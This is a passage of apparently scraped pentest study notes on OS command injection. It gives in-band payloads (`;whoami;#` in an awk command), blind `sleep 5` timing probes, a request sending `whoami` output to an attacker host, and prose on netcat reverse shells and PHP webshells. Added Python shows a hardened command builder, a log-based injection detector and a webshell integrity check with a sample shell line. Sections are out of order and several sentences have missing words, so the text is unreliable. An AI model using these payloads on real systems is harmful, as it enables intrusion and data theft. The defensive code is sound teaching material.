In-Band CI occurs when the attacker can directly insert and execute malicious commands in a web application or system’s input fields or parameters, using the same channel to both send commands and receive outputs.
Simple Payload
The example below is based on TCM's course.
The application takes our input and passes it into a curl command which is then grepped (Figure 1.1). We can start simple by just appending a command using ;, but this gives no output (Figure 1.2). Next, we can try commenting out the grep part by using # (Figure 1.3).
The application we need to test tracks the fleet vehicle's coordinates and calculates the distance between its current position and its destination (Figure 3).
We have two fields that are directly inputted within the executed command. We can start by trying to manipulate the second field first (Figure 4).
# original command
awk 'BEGIN {print sqrt(((-111)^2) + ((-222)^2))}'
# our goal command
awk 'BEGIN {print sqrt(((-111)^2) + ((-222)^2))}';whoami;#
# the payload
222)^2))}';whoami;#
# the final command
awk 'BEGIN {print sqrt(((-111)^2) + ((-222)^2))}';whoami;#)^2))}'
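As an added example (my own code, not from the notes or TCM's course), here is the command construction above written out in Python next to a hardened version. The unsafe builder reproduces the exact command string the notes show, because it splices both coordinates straight into a shell command line. The hardened builder allow-lists each coordinate as a plain number and hands the values to awk as separate argv entries through -v assignments, so the data never becomes part of the awk program and no shell parses it. The payload constant is the notes' payload with the minus sign the original field carried; the function names are mine.

```python
import math
import re
import shutil
import subprocess

# Constructed from the notes' payload: the closing quote ends awk's program,
# ';' terminates the command, and '#' comments out the rest of the line.
PAYLOAD = "-222)^2))}';whoami;#"

# Only plain (optionally signed) decimal numbers are acceptable coordinates.
NUMBER_RE = re.compile(r"-?\d+(\.\d+)?")


def build_command_unsafe(x: str, y: str) -> str:
    """Vulnerable pattern: user input spliced into a shell command string.

    Anything the user types becomes part of the command line that the
    application later hands to a shell (shell=True / system()).
    """
    return f"awk 'BEGIN {{print sqrt((({x})^2) + (({y})^2))}}'"


def is_plain_number(value: str) -> bool:
    """Allow-list check: the whole string must be a number, nothing else."""
    return NUMBER_RE.fullmatch(value.strip()) is not None


def build_argv_safe(x: str, y: str) -> list[str]:
    """Hardened pattern: validate, then pass data as separate argv entries.

    awk's -v assignments keep the values out of the program text, and an
    argv list with shell=False means no shell ever parses them.
    """
    for name, value in (("x", x), ("y", y)):
        if not is_plain_number(value):
            raise ValueError(f"coordinate {name} is not a plain number: {value!r}")
    return ["awk", "-v", f"x={x.strip()}", "-v", f"y={y.strip()}",
            "BEGIN {print sqrt(x^2 + y^2)}"]


def distance_safe(x: str, y: str) -> float:
    """Run the hardened command; fall back to math.hypot if awk is absent."""
    argv = build_argv_safe(x, y)  # raises on anything but numbers
    if shutil.which("awk") is None:
        return math.hypot(float(x), float(y))
    result = subprocess.run(argv, capture_output=True, text=True, check=True)
    return float(result.stdout.strip())


if __name__ == "__main__":
    print(build_command_unsafe("-111", PAYLOAD))  # the injected command line
    print(build_argv_safe("-111", "-222"))
    print(distance_safe("-111", "-222"))
    try:
        build_argv_safe("-111", PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
```

The validation step is what makes the difference for this application: once the input can only be a number, there is nothing left for a quote, semicolon or backtick to do. The argv form is the second layer; even if a value slipped through, it would reach awk as a string assigned to a variable, not as a command line.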
Blind CI occurs when the attacker does not see the output of the injected commands directly. Instead, they infer the success or failure of the commands through side effects or indirect responses.
localhost?q=`sleep 5`
We also use time and curl to measure the response time within the CLI.
$ time curl "http://localhost?q=localhost"
<html>
<SNIP>
</html>
real 0m0.062s # Normal response time
user 0m0.006s
sys 0m0.000s
$ time curl "http://localhost?q=`sleep+5`"
<html>
<SNIP>
</html>
real 0m5.063s # The 'sleep 5' payload worked
user 0m0.003s
sys 0m0.003s
Next, we can achieve this by spinning up a web server and passing the desired command as a parameter (Figure 8).
http://172.31.150.94:9999/?q=`whoami`
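From the defender's side, the timing probe above leaves a clear trace in access logs once the server records request duration. The following is an added example (my own code, not from the notes or TCM's course) that parses constructed access-log lines, decodes the query parameters, and flags values that contain shell metacharacters or sleep-style commands, attaching a slow-response indicator when the request took longer than a threshold. The log lines are hypothetical; the format assumes a common-log style line with the request time appended as a final field, which requires a custom log_format (for example nginx's $request_time) to exist at all.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (hypothetical). Format: client - - [time] "request"
# status bytes request_time; the last field is the server-side request duration.
LOG_LINES = """\
10.0.0.5 - - [12/Mar/2024:10:00:01 +0000] "GET /?q=localhost HTTP/1.1" 200 512 0.062
10.0.0.5 - - [12/Mar/2024:10:00:02 +0000] "GET /?q=localhost HTTP/1.1" 200 512 0.058
10.0.0.9 - - [12/Mar/2024:10:00:05 +0000] "GET /?q=localhost%3Bsleep+5 HTTP/1.1" 200 512 5.063
10.0.0.9 - - [12/Mar/2024:10:00:12 +0000] "GET /?q=%60sleep+5%60 HTTP/1.1" 200 512 5.071
10.0.0.9 - - [12/Mar/2024:10:00:20 +0000] "GET /?q=%60whoami%60 HTTP/1.1" 200 512 0.060
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) (?P<rt>\d+(?:\.\d+)?)$'
)
# Characters that let a value break out of a shell command.
SHELL_META_RE = re.compile(r"[;&|`\n]|\$\(")
# Commands typically used to make a blind injection observable through delay.
SLEEP_RE = re.compile(r"\b(sleep|timeout|ping)\b")


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["rt"] = float(rec["rt"])
    # parse_qsl undoes percent-encoding and '+' so we inspect what the app saw.
    rec["params"] = parse_qsl(urlsplit(rec["target"]).query, keep_blank_values=True)
    return rec


def classify_value(value, request_time, slow_seconds):
    """Indicators for one decoded parameter value; empty list means nothing suspicious."""
    indicators = []
    if SHELL_META_RE.search(value):
        indicators.append("shell-metacharacter")
    if SLEEP_RE.search(value):
        indicators.append("sleep-keyword")
    # A slow response on its own is not evidence; it only strengthens a suspect value.
    if indicators and request_time >= slow_seconds:
        indicators.append("slow-response")
    return indicators


def scan_access_log(text, slow_seconds=2.0):
    """Scan log text and return one finding per suspicious parameter value."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            indicators = classify_value(value, rec["rt"], slow_seconds)
            if indicators:
                findings.append({
                    "ip": rec["ip"], "ts": rec["ts"], "param": name,
                    "value": value, "request_time": rec["rt"],
                    "indicators": indicators,
                })
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(LOG_LINES):
        print(finding)
```

The threshold is deliberately coarse; in practice it should be derived from the normal latency of the same endpoint (the 0.06 s baseline in the curl output above) rather than a fixed constant, and the metacharacter match is what separates an injection probe from a request that was slow for unrelated reasons.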
Capabilities Recon
When we achieve RCE, we can enumerate the target for useful binaries. The string w00tw00t was added to the wordlist as an example of what the response for a non-existent binary looks like.
If the target is hardened and we are unable to get a reverse shell, we can try downloading a binary to the target ourselves. In the example below, we download the netcat binary, make it executable, and then execute a reverse shell payload.
If we don't have access to unique binaries and we know the technology that the application uses, we can write our own backdoor. We first need to find the present working directory via the CI vulnerability (Figure 9).
We can create a payload that creates a PHP webshell under the webroot.
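A file dropped under the webroot is exactly what file-integrity monitoring is meant to catch. As an added example (my own code, not from the notes or TCM's course), the snippet below hashes a baseline snapshot of the webroot, diffs it against a later snapshot, and marks added or modified files whose contents call a PHP command-execution function on request data. Both snapshots are constructed in-memory mappings with hypothetical paths; a real deployment would walk the directory tree and persist the baseline manifest somewhere the web server's user cannot write.

```python
import hashlib
import re

# Constructed webroot snapshots (hypothetical paths and contents): path -> bytes.
BASELINE_FILES = {
    "/var/www/html/index.php": b"<?php echo 'Network Checker'; ?>",
    "/var/www/html/style.css": b"body { color: #222; }",
}
# Later snapshot: one benign edit and one newly written PHP file under an
# upload directory that passes request data straight to system().
CURRENT_FILES = {
    "/var/www/html/index.php": b"<?php echo 'Network Checker'; ?>",
    "/var/www/html/style.css": b"body { color: #333; }",
    "/var/www/html/uploads/.cache.php": b"<?php system($_REQUEST['c']); ?>",
}

# PHP functions that run commands or code, fed directly from request data.
WEBSHELL_RE = re.compile(
    rb"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
    rb"\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)


def manifest(files):
    """Map each path to the SHA-256 of its contents."""
    return {path: hashlib.sha256(content).hexdigest() for path, content in files.items()}


def diff_manifests(baseline, current):
    """Report paths that appeared, changed, or disappeared between two manifests."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return {"added": added, "modified": modified, "removed": removed}


def looks_like_webshell(content):
    """Heuristic: a command/code-execution call whose argument comes from the request."""
    return WEBSHELL_RE.search(content) is not None


def review_changes(baseline_files, current_files):
    """Combine the manifest diff with the content heuristic into findings sorted by path."""
    delta = diff_manifests(manifest(baseline_files), manifest(current_files))
    findings = []
    for path in delta["added"] + delta["modified"]:
        reasons = ["added" if path in delta["added"] else "modified"]
        if looks_like_webshell(current_files[path]):
            reasons.append("webshell-pattern")
        findings.append({"path": path, "reasons": reasons})
    return sorted(findings, key=lambda f: f["path"])


if __name__ == "__main__":
    for finding in review_changes(BASELINE_FILES, CURRENT_FILES):
        print(finding)
```

The content heuristic will miss obfuscated shells, so the manifest diff is the primary signal: any new or changed PHP file in a directory that should never receive code at runtime (an upload or cache directory) deserves a look regardless of what it contains.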
We can also try to achieve this by first checking which technology the application uses and then getting a payload from a repository such as (Figure 2).
The example below is based on TCM's course.
We can achieve RCE with the same logic using the (Figure 5).
The example below is based on TCM's course.
This time we have the same Network Checker app, but the does not work (Figure 6.1). Either something gets filtered, which we can check (Figure 6.2 & 6.3), or the command is executed but we don't get any output on the front-end.
We can try a payload that alters the application's behaviour (similar to ) and see if this works. This can be tested with Burp Suite's Repeater, as it shows the response time in the bottom right corner (Figure 7).
Next, we can try sending a from the target to our attack host.